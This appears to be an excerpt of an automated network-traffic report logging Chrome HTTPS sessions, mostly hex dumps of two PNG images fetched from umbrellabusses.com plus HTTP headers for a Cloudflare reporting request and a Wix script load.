                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8ffd26bfeab98c51-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2008&min_rtt=2000&rtt_var=767&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=942&delivery_rate=1411992&cwnd=235&unsent_bytes=0&cid=b6dc6a5d205e5f06&ts=165&x=0"
                                                                                                                                                                                                                        2025-01-10 13:53:06 UTC367INData Raw: 31 65 61 36 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 06 00 00 00 f4 78 d4 fa 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 1e 24 49 44 41 54 78 9c ed dd 0b 94 65 57 59 27 f0 4a 20 0f 42 82 84 77 20 93 a6 bb ef 3e b7 28 08 a3 74 50 d0 81 80 03 8c a8 71 60 24 03 c8 4b 96 33 3d 8e ae 2c 68 92 aa 73 6e 07 e7 e2 63 d6 04 d4 95 71 40 09 ea 1a 45 51 24 33 71 04 34 08 48 2a 75 ce ed 4e 82 ed f0 6a de 08 61 8c 3c 84 00 49 08 e4 d1 49 cf 3e 95 10 ab aa f3 e8 47 55 7d a7 ee fd fd d6 fa 2f 9a b5 08 e9 7b f6 b7 f7 77 f6 7d ec 33 35 05 00 00 00 00 00 00
                                                                                                                                                                                                                        Data Ascii: 1ea6PNGIHDRxgAMAasRGB cHRMz&u0`:pQ<$IDATxeWY'J Bw >(tPq`$K3=,hsncq@EQ$3q4H*uNja<II>GU}/{w}35
                                                                                                                                                                                                                        2025-01-10 13:53:06 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 81 66 47 fd 93 e6 9a de b3 cb 26 9d 5b 35 e9 77 aa ba 78 5f fe f3 a7 ab a6 f8 87 b2 4e df 28 eb e2 b6 9c 1b f3 9f bf 9e ff f3 ef ab 3a fd 6d fe f3 9f 95 4d f1 6b f9 7f f7 f2 fc cf f7 a3 5f 03 00 70 5f f6 4f 1d 55 8d b6 3e 35 37 fa df c8 0d 7f 4f 6e f4 fb 72 f6 1f 51 ea e2 ab 39 7f 3e 68 8a 9f db b1 7b e6 21 d1 2f 11 00 b8 53 6e f6 5b f2 8e fd f5 79 f7
                                                                                                                                                                                                                        Data Ascii: fG&[5wx_N(:mMk_p_OU>57OnrQ9>h{!/Sn[y
                                                                                                                                                                                                                        2025-01-10 13:53:06 UTC1369INData Raw: 0f 8b ae 0b 00 c6 58 6e 36 83 f8 86 27 77 25 df 88 b5 5f c2 8c ae 0b 00 c6 58 59 17 65 78 c3 93 95 f9 af d1 75 01 c0 18 cb 8d e6 0d 1d 68 76 b2 2c e9 03 1e f9 0b c0 da d8 3f 75 54 59 a7 0b e3 9b 9d 2c 4b 5d 7c b8 6a 4e 3f 39 ba 3c 00 18 47 b9 f9 57 75 7a 53 78 b3 93 15 49 9f 19 5c b1 f9 91 d1 e5 01 c0 18 6a df 5a ce bb cc b7 c6 37 3b 59 9a b2 49 9f de b9 3b 3d 26 ba 3e 00 18 43 8b cd bf 49 7f 1c dd ec 64 45 f3 af d3 27 67 47 fd 47 47 d7 07 00 63 68 b8 77 e6 d8 b2 2e 2e 89 6e 76 b2 b2 f9 17 1f 1a d4 bd 87 47 d7 07 00 63 e8 9c 4b 7b c7 e5 5d e6 3b a3 9b 9d ac 4c da 53 5d 35 fd d0 e8 fa 00 60 0c 0d f7 9c 72 42 de 65 be 3f be d9 c9 d2 94 4d 1a 0d af ec 3d 28 ba 3e 00 18 43 c3 f9 99 13 f3 ce ff b2 e8 66 27 07 64 61 76 d4 3f 29 ba 3e 00 18 43 c3 f9 4d 0f ae ea
                                                                                                                                                                                                                        Data Ascii: Xn6'w%_XYexuhv,?uTY,K]|jN?9<GWuzSxI\jZ7;YI;=&>CIdE'gGGGchw..nvGcK{];LS]5`rBe?M=(>Cf'dav?)>CM
                                                                                                                                                                                                                        2025-01-10 13:53:06 UTC1369INData Raw: b3 c5 a4 29 7e d7 4d 00 2b b5 87 49 e5 9d ff 17 a3 eb 53 56 26 fd 8e 77 ee 60 1d b4 9f 7d 56 75 fa c7 f8 49 bf b6 c9 37 01 7f 6a 47 c1 f7 cc 8e fa fd f6 57 23 d1 75 29 2b e7 69 fa 6d cd 1f d6 41 fb 80 93 bc 08 be 3f 7a d2 af 5f d2 c5 ed 89 86 d1 d7 9d 58 83 ba 37 93 1b cd 97 e2 eb 51 56 cc cf 0b a2 6b 03 26 46 5e 04 5f 1b 3f e9 d7 7d 91 f9 8b f6 80 a3 e8 6b 4f 8c aa 99 de 56 d6 e9 eb f1 75 28 2b f2 4b d1 b5 01 13 a3 fd fc 73 9c 3f f7 bf b7 e4 1b 9f f7 ec d8 7d ea 03 a2 c7 80 f5 35 3b ea 9f 51 d5 e9 da e8 fa 93 03 e6 e3 6b a3 6b 03 26 ca 64 bd f5 7f b7 59 70 ac e8 e4 68 4f 88 cc cd ff fa 0e d4 9d 7c 2f 75 71 7b fe cf 57 47 d7 06 4c 94 b2 e9 9d 15 3e f9 bb 90 3a 35 c3 2b 7b 0f 8a 1e 0f d6 d6 9d 0f b3 ba 31 bc de e4 ae b4 cf 17 19 d4 e9 3f 46 d7 06 4c 9c 3c
                                                                                                                                                                                                                        Data Ascii: )~M+ISV&w`}VuI7jGW#u)+imA?z_X7QVk&F^_?}kOVu(+Ks?}5;Qkk&dYphO|/uq{WGL>:5+{1?FL<
                                                                                                                                                                                                                        2025-01-10 13:53:06 UTC1369INData Raw: 7a 99 6b 8a e7 e6 1b 9f ef 86 5f 77 59 9a 7d 55 dd 7b 65 74 6d 00 eb a8 6d 3e 1d 58 7c 64 42 9e a7 5e 36 bd b3 f2 6b bd a9 03 d7 5b fe 39 b9 f9 17 2f 8b ae 0d 60 9d 95 4d 7a 7e 07 16 20 69 16 bf 75 fd 91 f6 59 0d d1 35 b1 56 f2 cd e6 8b f3 6b bc 35 fa 3a cb 92 9a ab d3 cd ed 1a 10 5d 1b 40 84 fd 53 47 55 4d fa 40 f4 42 24 77 a6 4e 9f da b9 3b 3d 26 ba 2c 56 db 5c d3 fb 19 cd bf 73 b9 a9 5c 28 fe 6d 74 6d 00 81 aa 7a ba f0 99 6c 97 92 be 70 fe 42 b1 39 ba 2e 56 4b 7e 3d db db 2f 98 c5 5f 57 f9 5e da 2f 60 b6 5f c4 8c ae 0d a0 03 f2 22 fd cb d1 8b 92 2c 4d fa 42 ce 96 e8 ba 38 52 f9 b5 bc da a9 93 1d 4b 9d ae 2f 17 d2 d3 a3 6b 03 e8 88 f6 8c fa bc 2b a8 c3 17 27 59 92 f4 e5 b9 66 eb e3 a3 6b e3 70 0d ea 62 2e fe 1a ca 8a 7c ab 1a 6d 7d 6a 74 6d 00 1d d3 3e
                                                                                                                                                                                                                        Data Ascii: zk_wY}U{etmm>X|dB^6k[9/`Mz~ iuY5Vk5:]@SGUM@B$wN;=&,V\s\(mtmzlpB9.VK~=/_W^/`_",MB8RK/k+'Yfkpb.|m}jtm>
                                                                                                                                                                                                                        2025-01-10 13:53:06 UTC1369INData Raw: 36 84 b9 3a bd a8 6c d2 ad d1 8b b7 c8 91 24 d7 f0 a7 e7 e6 7b a7 46 cf 27 80 0d a5 6a fa 67 57 75 ba 25 7a 11 17 39 9c e4 9d ff 27 67 47 fd 47 47 cf 23 80 0d 69 6e 21 fd 84 27 d6 c9 46 4b 59 17 1f 1a d4 bd 87 47 cf 1f 80 0d ad aa 8b 1f cb f9 4e f4 a2 2e 72 70 49 7b aa ab a6 1f 1a 3d 6f 00 c6 42 b9 90 9e 5e d5 e9 fa f8 c5 5d e4 9e 53 36 69 34 bc b2 f7 a0 e8 f9 02 30 56 06 75 f1 23 65 5d 5c 17 bd c8 8b dc 43 16 66 47 fd 93 a2 e7 09 c0 58 aa 9a e9 6d 65 9d be de 81 c5 5e e4 ae e4 9d ff 7b 76 ec 3e f5 01 d1 f3 03 60 ac ed 1c a5 ef 2f 9b e2 9f a2 17 7d 91 3b f3 97 c3 f9 4d c7 47 cf 0b 80 89 30 77 79 7a 5c 55 a7 7f ec c0 e2 2f 13 9d 74 f1 f6 3d db 8e 89 9e 0f 00 13 a5 aa a7 8b bc 08 ff 43 7c 13 90 09 cd db 87 f3 67 de 3f 7a 1e 00 4c a4 72 be ff d8 b2 2e fe be
                                                                                                                                                                                                                        Data Ascii: 6:l${F'jgWu%z9'gGGG#in!'FKYGN.rpI{=oB^]S6i40Vu#e]\CfGXme^{v>`/};MG0wyz\U/t=C|g?zLr.
                                                                                                                                                                                                                        2025-01-10 13:53:06 UTC642INData Raw: e6 bc f6 49 bb 5e 33 5f 3c 2c fa 7a 03 40 67 ec 5c d8 fa a4 f6 ad f1 f8 26 bd 46 3b ff 3a bd ad 7d 46 42 f4 75 06 80 ce 69 77 c7 b9 51 be 33 ba 59 af 6a ea e2 3b 1e e7 0b 00 07 a1 6c d2 cb ef 38 19 af 03 0d fc c8 9a ff 5e df f4 07 80 43 30 d7 6c 7d 7c 59 a7 cb c2 9b f8 e1 ee fa eb f4 2b de f2 07 80 c3 54 36 bd b3 ca 26 7d 3e bc a9 1f 64 ca a6 78 f7 f9 0b c5 e6 e8 eb 06 00 1b de 8e dd a7 3e 20 37 d6 aa 6a d2 97 a3 1b fc 3d 36 fe 3a 5d 36 a8 7b 67 46 5f 2b 00 18 3b c3 bd 33 c7 b6 df 0f c8 0d f7 13 d1 0d ff 8e a6 5f dc d6 ee f8 9d e5 0f 00 eb a0 7d bc 70 55 17 3f 96 f3 d6 88 f3 03 f2 6e ff 63 f9 46 e4 b5 e5 7c ff b1 d1 d7 02 00 26 d2 70 7e d3 f1 83 26 fd bb f6 66 a0 6a d2 17 d6 a8 e1 df dc 1e e2 d3 7e b1 6f b0 6b fa 09 d1 af 19 00 58 a1 6c b6 9c 96 6f 06 5e
                                                                                                                                                                                                                        Data Ascii: I^3_<,z@g\&F;:}FBuiwQ3Yj;l8^C0l}|Y+T6&}>dx> 7j=6:]6{gF_+;3_}pU?ncF|&p~&fj~okXlo^
                                                                                                                                                                                                                        2025-01-10 13:53:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        76192.168.2.54999035.190.80.14435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:06 UTC549OUTOPTIONS /report/v4?s=h%2BCxDTqcl9%2Bp1xH1t8iXLJONVqNNYhgZvv%2F%2FqBy4dfDikrLNjYBlHsEkALCauQSUchQFAL2B%2Fj35ai1J0OblAiseg9x5rGB6DnIptADkQpxJHw5CLhsGWjjF%2BAk5rXtzqqkW3kM%3D HTTP/1.1
                                                                                                                                                                                                                        Host: a.nel.cloudflare.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Origin: https://umbrellabusses.com
                                                                                                                                                                                                                        Access-Control-Request-Method: POST
                                                                                                                                                                                                                        Access-Control-Request-Headers: content-type
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:06 UTC336INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        access-control-max-age: 86400
                                                                                                                                                                                                                        access-control-allow-methods: POST, OPTIONS
                                                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                                                        access-control-allow-headers: content-length, content-type
                                                                                                                                                                                                                        date: Fri, 10 Jan 2025 13:53:06 GMT
                                                                                                                                                                                                                        Via: 1.1 google
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        77192.168.2.549994104.21.83.974435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:06 UTC363OUTGET /samhentir/img/log.png HTTP/1.1
                                                                                                                                                                                                                        Host: umbrellabusses.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:06 UTC998INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 13:53:06 GMT
                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Last-Modified: Sun, 15 Dec 2024 15:17:22 GMT
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        ETag: W/"675ef302-1f68"
                                                                                                                                                                                                                        Expires: Thu, 06 Feb 2025 10:58:04 GMT
                                                                                                                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                        Age: 269702
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lyhQVQuB2oJa5hjgU3%2BaW%2FIQ6P2meSVFjIHLUYNcHDsiBqsU2p4kvkqguM4jIfiAFudCZP4keW5gqyHuPJsxnrXqJtOs%2BCKSqxS2n9Kh7aw%2FNnZPDmD9Xg09ooobGMxV7rgQ8z4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8ffd26c10c12c360-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1486&min_rtt=1483&rtt_var=562&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=941&delivery_rate=1935056&cwnd=138&unsent_bytes=0&cid=09a6a04a1c6f7dc7&ts=149&x=0"
                                                                                                                                                                                                                        2025-01-10 13:53:06 UTC371INData Raw: 31 66 36 38 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 52 00 00 00 65 08 06 00 00 00 de 53 b4 8e 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 1f 22 49 44 41 54 78 5e ed 9c 79 98 5c 55 99 ff bf 67 b9 5b 6d bd 26 e9 44 08 24 64 23 1b 24 84 25 40 4c c2 32 c1 80 20 8e 04 45 18 7c 20 e3 fc a2 e3 32 a8 30 2c c9 e8 38 b8 8d 83 8a fe 18 70 10 44 87 61 9f 8c 30 8a 8e 90 c8 4f d9 21 80 24 6c 01 42 12 42 02 9d a5 bb 6b bb db 39 67 9e f7 dc 6a 60 9c 87 9f d5 49 35 f2 47 d7 f3 74 aa 53 75 eb d6 bd 9f fb 2e df f7 3d ef 6d 86 91 47 4b 08 b0 96 ec 65 64 27 18 01 d9 22 23 18 01 39 02 b2 45 04 5a b4 9b 11 8b 1c 01 d9 22 02 2d da cd 88 45 8e 80 6c 11 81 16 ed 66 c4 22 47 40 b6 88 40 8b 76 33 62 91 23 20 5b 44 a0 45 bb 79 cf 5a e4 ad c6 88 89 8f 83 97 0f
                                                                                                                                                                                                                        Data Ascii: 1f68PNGIHDRReSsRGB"IDATx^y\Ug[m&D$d#$%@L2 E| 20,8pDa0O!$lBBk9gj`I5GtSu.=mGKed'"#9EZ"-Elf"G@@v3b# [DEyZ
                                                                                                                                                                                                                        2025-01-10 13:53:06 UTC1369INData Raw: 27 b3 de 7d 38 f7 96 7e f4 4f 0e 72 e5 0f d6 7d e5 f1 0d 2f af da b5 bb 82 42 71 14 98 0c 00 f8 60 8e 87 44 19 30 c1 e1 e7 3c a4 aa 0e 23 34 1c d7 20 8e eb e8 6c 2f 61 ce b4 f1 2b 2f fe 50 d7 e5 ef 05 b7 ff 93 81 fc f5 6f 6b e3 7f 76 f7 bd b7 fc 7e d3 ae a3 42 6b 7d 25 38 5e 1e 4a 33 70 37 80 e3 7a 48 0c 60 98 86 0c 5c 28 10 54 c0 0b 5c c4 71 0c 63 0c ba db 5d 74 ba b5 de f7 1f 31 6b e9 c7 8e 74 1f 6b a9 89 0d 71 67 ef 3a 48 63 8c f8 f1 2d 5b cf 58 73 cf 6f be b5 6d 57 65 ff 01 25 e0 e6 3b e1 07 05 68 48 18 08 08 2f 07 48 89 58 a5 f0 72 01 84 23 ac 8b 83 1b b8 be 03 c6 98 7d 0f 2c 81 e7 68 b8 a8 61 d6 81 e3 7e 75 e4 cc 83 3e 76 ca 6c b6 67 88 0c 5a b2 f9 bb 0a 72 cd 1d bd 27 3f f1 ca 96 e5 db 76 0e 2c dc f0 cc c6 8e de 72 15 85 51 3d 50 8e 0b 18 01 e6 f8
                                                                                                                                                                                                                        Data Ascii: '}8~Or}/Bq`D0<#4 l/a+/Pokv~Bk}%8^J3p7zH`\(T\qc]t1ktkqg:Hc-[XsomWe%;hH/HXr#},ha~u>vlgZr'?v,rQ=P
                                                                                                                                                                                                                        2025-01-10 13:53:06 UTC1369INData Raw: b8 27 ad 45 88 38 81 4e e2 ac 2e f6 5d 30 95 66 28 39 43 5d 18 fc e8 ce 3b 50 f5 98 85 c8 09 9c 57 b0 20 5d 2f b0 ee 2c 24 bd 4e 30 09 24 6f 80 a4 18 99 41 1c 8c 91 24 77 c8 d5 c9 ad 6d 32 6a 00 26 d9 64 2d 93 40 32 63 ad 2f d2 29 94 cd fe 01 1c cf 87 36 0c 2a 51 30 5a a1 e0 32 38 71 0d 25 13 63 fa 98 ce af 7d 7e 4e e9 d2 bd 81 39 24 90 f7 df 1f 1f fa 5f 3f 7f f0 d7 a5 60 6c 37 57 79 48 cd e1 1a 0a e4 0a 31 34 74 92 c2 63 02 39 c7 b3 31 8d aa 10 69 c7 8b e8 64 19 22 09 fc e8 ce db 50 77 19 44 e0 81 f9 3e b8 57 00 77 7d 6b 91 04 92 7e 27 e1 4d 30 6d 8c f4 32 4b a2 20 47 32 e7 0f 41 da a4 c3 15 8c 44 23 f9 d0 33 07 23 9a 5c 80 81 5b d7 a6 0c 9e a6 89 d5 a4 dc 63 10 2e 83 06 83 d2 2e 3a 73 79 e8 de 6d e8 d2 75 b3 68 da a4 29 cb 26 b1 17 87 0a 73 48 20 bf f7
                                                                                                                                                                                                                        Data Ascii: 'E8N.]0f(9C];PW ]/,$N0$oA$wm2j&d-@2c/)6*Q0Z28q%c}~N9$_?`l7WyH14tc91id"PwD>Ww}k~'M0m2K G2AD#3#\[c..:symuh)&sH
                                                                                                                                                                                                                        2025-01-10 13:53:06 UTC1369INData Raw: 14 5c e3 a2 2d d7 8e 34 26 d5 40 f2 29 03 49 e5 a6 fd b1 52 8a e2 b8 63 1b c7 9e cf a1 92 08 ae 16 e8 a9 d7 70 ea 01 dd 85 25 c3 00 52 5c f0 e5 47 53 ad 3a ad c0 75 e8 c0 a2 08 be e7 d8 e0 6e 75 1a 9c c6 95 49 29 87 bf f9 c3 60 10 d3 95 2e d0 b2 c1 00 56 ff f2 5f 70 fa 47 4f b9 e2 92 cf 1e f7 85 7d 01 f8 87 9f bd fe 25 33 f9 91 57 b6 6c d8 52 a9 39 2c 5f 84 23 73 88 23 5a be f5 1b 9d a2 86 7b 73 82 c8 a1 48 c0 37 3a 45 ca 28 e4 f2 12 71 14 41 c6 c0 b8 24 c2 c7 0e e8 2c 1d 3b 04 09 d4 b4 6b 7f 7e d5 c3 a9 32 5d 90 d2 81 51 9a f4 2f 32 eb 33 19 36 d3 88 39 48 ad 25 52 a2 21 4d 49 20 a9 63 1d a7 0a 5c 56 71 ca b2 43 a7 cc 99 ce 36 b6 12 e2 db f7 75 c2 ca 5b eb a3 67 cf f6 d9 b8 31 e8 0d 43 90 d7 53 93 98 2b 63 55 00 25 a1 ba 4a 6c d5 24 5d 32 04 0d 41 4d 0e
                                                                                                                                                                                                                        Data Ascii: \-4&@)IRcp%R\GS:unuI)`.V_pGO}%3WlR9,_#s#Z{sH7:E(qA$,;k~2]Q/2369H%R!MI c\VqC6u[g1CS+cU%Jl$]2AM
                                                                                                                                                                                                                        2025-01-10 13:53:06 UTC1369INData Raw: 97 5d 31 a5 78 79 b3 df db 34 c8 b5 c6 c8 ff 7b d1 ba 24 92 dd 48 58 d5 4a 19 27 c9 9a 12 b6 49 ca b2 66 2e c5 cb 6c b1 8b de b3 03 8d d6 32 85 a1 ec 49 27 30 00 c1 06 70 f6 39 8b a6 1d 3b 8d 3d 3f 94 03 fd 63 db 3e f8 eb de 45 b7 dc 70 fb 5a 37 0d c0 34 95 b1 1c 11 4d f6 72 8d 04 31 62 15 41 99 14 3a 55 a0 16 aa 56 0a b1 56 a8 98 08 bc 18 60 57 2d c4 eb ae c2 c2 2f 2e c7 98 51 c5 f3 bf 71 68 57 53 2d bd c1 e3 6a 2a 46 ae 5f 6f dc bf fb e9 63 51 5d 74 21 41 08 e9 08 88 84 ea 69 6e cb 2c 2b bc 1b eb d7 19 50 c2 98 75 26 29 e8 57 cb 03 68 2b 78 90 2c 46 1a ed c6 84 03 ba ef 5e b5 62 da 90 3a d0 7f 0c e4 3f 5e f2 b3 de 3d db fb bb 91 48 50 17 9f 16 d2 ad 3d ea 24 4b 34 3a b6 b1 11 4a 43 6b d8 e5 58 6a 56 94 75 68 17 d5 64 2a b0 8d e6 83 8e 9b 83 e3 4e 5e 78
                                                                                                                                                                                                                        Data Ascii: ]1xy4{$HXJ'If.l2I'0p9;=?c>EpZ74Mr1bA:UVV`W-/.QqhWS-j*F_ocQ]t!Ain,+Pu&)Wh+x,F^b:?^=HP=$K4:JCkXjVuhd*N^x
                                                                                                                                                                                                                        2025-01-10 13:53:06 UTC1369INData Raw: 14 51 4f 6b 76 bb c5 27 1e 73 d9 27 3e 37 bf f5 95 0d 71 a2 7a fb 7b 5f fa af 34 e4 3d 88 78 60 e7 b6 e9 ea 0d 0e 06 10 98 6c ae 34 bb a3 60 10 28 f5 f8 6c 0c 6b 64 04 02 69 87 06 48 cb 99 18 71 52 87 ef 48 88 54 03 d5 08 b9 34 45 b7 74 71 c4 c4 89 38 a0 ad 0d 1e bd 46 83 a1 9a 66 1a 53 84 2a 46 62 28 13 2b db 89 4a 6a f1 5b ee 4a 0d 0a 43 72 87 dc 34 3b 06 aa a9 07 41 66 af 51 f6 a6 4f 0f c6 d6 4c 65 44 74 fb 05 57 76 86 e8 4b 17 2e ef 9c bd a0 7d 48 b7 e2 35 6d 91 c4 68 c5 8f b7 ae 79 68 fd 1b 8b 43 96 b3 20 63 93 40 51 75 43 1d 1e 8a 91 9a 62 20 3d 53 f2 c9 80 da c4 42 bf db 67 05 46 27 43 b2 83 5c 5c c7 60 5c 23 ad 0c 20 af 0c da 95 c1 bc 09 93 31 7b bf 09 28 6a 01 27 49 61 92 18 49 5c 87 4a ea 76 76 87 f6 45 33 e1 69 4c 50 48 11 50 12 c9 92 0d 59 53
                                                                                                                                                                                                                        Data Ascii: QOkv's'>7qz{_4=x`l4`(lkdiHqRHT4Etq8FfS*Fb(+Jj[JCr4;AfQOLeDtWvK.}H5mhyhC c@QuCb =SBgF'C\\`\# 1{(j'IaI\JvvE3iLPHPYS
                                                                                                                                                                                                                        2025-01-10 13:53:06 UTC832INData Raw: 69 9d 8a 06 1a 48 a4 6e 10 55 44 ca 0e c8 93 f9 a8 1a b5 b1 60 dd d0 5a 14 dd b7 48 59 3a 49 ac 6e 24 d1 4d f7 13 66 f2 26 ab d1 33 8b cc 64 d1 a0 86 24 90 b4 0f ab 21 a9 62 b2 2b 87 09 f2 45 bf ef 98 13 8e 3e 6b e9 19 93 f6 4a d6 34 0b 74 58 40 0e 7e f9 f6 17 cd e2 ad 4f f7 5d 56 7d a3 7a 5c dc 17 41 b2 00 46 d0 84 2c 43 48 55 8e 36 70 49 ee 24 b4 38 95 81 a4 0e 08 55 2a 64 a1 31 95 a0 e0 88 49 74 bf ad 5d 36 98 91 6d 85 43 9a d4 15 a8 45 35 28 46 f6 99 58 5d 68 64 8a 99 73 67 7e 7d f9 67 8e bd a4 59 18 fb b2 dd b0 82 a4 03 db b4 c9 f8 6c 07 2e d8 fe f2 8e 73 fb 5e 2f 4f 31 da 45 9c 52 ae a1 a1 01 09 84 75 7b 67 2b f5 30 09 9e d5 92 36 c1 64 e5 20 ad 52 92 ee b3 37 89 0a 81 88 ca 45 9a 82 e3 24 ae 23 7b ee b4 76 4d 37 f1 d1 32 17 41 1c b5 5f e7 d3 27 9f
                                                                                                                                                                                                                        Data Ascii: iHnUD`ZHY:In$Mf&3d$!b+E>kJ4tX@~O]V}z\AF,CHU6pI$8U*d1It]6mCE5(FX]hdsg~}gYl.s^/O1ERu{g+06d R7E$#{vM72A_'
                                                                                                                                                                                                                        2025-01-10 13:53:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        78192.168.2.54999834.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:06 UTC631OUTGET /services/wix-thunderbolt/dist/reporter-api.6946832d.chunk.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1164INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 06:45:16 GMT
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        Content-Length: 35199
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        Last-Modified: Fri, 10 Jan 2025 05:59:16 GMT
                                                                                                                                                                                                                        ETag: "0791809290eee3cb00a08a33e5ae90f3"
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: 6OgDcDzOJXgYEKTi2Z37UewVnBK5VK8g
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Varnish: 1072452589 908634488
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0),1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: false
                                                                                                                                                                                                                        X-Varnish: 178036624
                                                                                                                                                                                                                        Age: 25670
